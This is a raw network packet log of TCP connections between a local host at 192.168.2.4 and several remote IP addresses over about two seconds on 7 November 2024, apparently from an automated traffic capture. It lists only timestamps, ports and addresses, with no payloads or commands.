Nov 7, 2024 07:33:21.712788105 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.716536045 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.716562986 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.716799974 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.717050076 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.717062950 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.717786074 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.717817068 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.717891932 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.718012094 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.718024969 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.719748020 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:21.719763041 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:21.765945911 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.766268015 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.766278982 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.766607046 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.766941071 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.767007113 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.767083883 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.791522980 CET	80	49871	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:21.791584969 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:21.811331034 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:21.855479002 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:21.859047890 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:21.864010096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:21.864075899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:21.865475893 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:21.870374918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:21.953844070 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.957710028 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.957721949 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.958091974 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.960464954 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:21.960545063 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:21.960973024 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.003333092 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.095634937 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095690966 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095721960 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095804930 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.095814943 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095844984 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095870972 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095891953 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.095900059 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.095928907 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.096400976 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.096450090 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.096502066 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.128740072 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.128817081 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.128905058 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.173475027 CET	49873	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.173484087 CET	443	49873	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.241170883 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.241190910 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.241379023 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.241771936 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.241784096 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.243891001 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.262432098 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.262444973 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.263128042 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.263132095 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.331458092 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:22.331509113 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:22.331566095 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:22.334461927 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.335721970 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:22.340590954 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:22.390439987 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.390564919 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.390626907 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.407913923 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.407924891 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.408440113 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.437376022 CET	49874	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.437386990 CET	443	49874	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.443608999 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.443725109 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.444179058 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.445604086 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.448920965 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.457720041 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.463434935 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.472599983 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.472640038 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.473059893 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.473066092 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.476264000 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.487330914 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.506107092 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.506128073 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.506522894 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.506527901 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.506810904 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.506823063 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.507446051 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.507452011 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.508474112 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.508493900 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.509253025 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.509258986 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.522958040 CET	56001	49876	162.230.48.189	192.168.2.4
Nov 7, 2024 07:33:22.545475960 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.547719955 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.547744036 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.547874928 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.549259901 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.549271107 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.549760103 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.589168072 CET	49884	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.589181900 CET	443	49884	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.589540958 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.589653015 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.590039015 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.600827932 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.600871086 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.600925922 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.610342979 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.610428095 CET	443	49875	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:22.610477924 CET	49875	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:22.612461090 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.612483978 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.612494946 CET	49879	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.612502098 CET	443	49879	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.631041050 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.631098032 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.631155014 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.631522894 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.631534100 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.631544113 CET	49880	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.631547928 CET	443	49880	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.635339022 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.636138916 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.636167049 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.636214018 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.636269093 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.636843920 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.637057066 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.638916016 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.647006989 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.647006989 CET	49878	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:22.647016048 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.647025108 CET	443	49878	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:22.658113956 CET	49876	56001	192.168.2.4	162.230.48.189
Nov 7, 2024 07:33:22.784785032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.784847975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.784858942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.784926891 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.785486937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785543919 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.785561085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785573006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785604000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.785615921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.785793066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785804987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785816908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785830021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.785845995 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.785860062 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.789760113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.789839029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.789978981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.917682886 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.917764902 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.917815924 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.917835951 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.918061018 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.918093920 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.918196917 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.918203115 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.918258905 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.918263912 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.926224947 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.926285028 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:22.926290989 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:22.942892075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.942959070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.942962885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.942969084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943002939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943116903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943130970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943144083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943157911 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943186998 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943536997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943593025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943630934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943643093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943672895 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943685055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.943871975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943883896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.943926096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.944458961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.944509029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.944545984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.944559097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.944581985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.944622993 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.944785118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.944796085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.944833040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.945343971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.945386887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.945425987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.945437908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.945468903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.945481062 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.945674896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.945687056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.945734024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.946254015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.946294069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:22.947746992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.947762966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:22.947824955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.034518003 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.034584999 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.034646988 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.034657955 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.034706116 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.034710884 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.037399054 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.038928986 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.038934946 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.041707993 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.042916059 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.042921066 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.050709009 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.050945044 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.050950050 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.059154034 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.059364080 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.059369087 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.064907074 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.067910910 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.067956924 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.067962885 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.076647043 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.076775074 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.076781988 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.085406065 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.085468054 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.085473061 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.094279051 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.094918966 CET	49877	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:23.094924927 CET	443	49877	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:23.100724936 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.100809097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.100825071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.100838900 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.100857973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.100888014 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.100897074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.100910902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.100943089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101047039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101056099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101088047 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101108074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101130962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101151943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101175070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101332903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101345062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101382971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101553917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101562977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101598024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101777077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101788044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101799011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101811886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.101823092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101843119 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.101877928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.102148056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102158070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102168083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102179050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102190018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102196932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.102226019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.102602959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102613926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102623940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102634907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102655888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.102665901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.102962971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102974892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.102986097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103004932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103012085 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103035927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103061914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103235960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103274107 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103409052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103419065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103429079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103441000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103454113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103467941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103467941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103476048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103507042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.103880882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.103919983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.104015112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104026079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104036093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104048967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104059935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104060888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.104077101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104084969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.104089022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104098082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.104109049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.104139090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.105846882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.105916977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.105978966 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.106034994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.106070995 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.106084108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.106125116 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.135823965 CET	49883	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.135834932 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.136275053 CET	443	49883	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.137583971 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.137609959 CET	443	49881	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:23.137624979 CET	49881	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:23.137631893 CET	443	49881	13.107.246.45	192.168.2.4
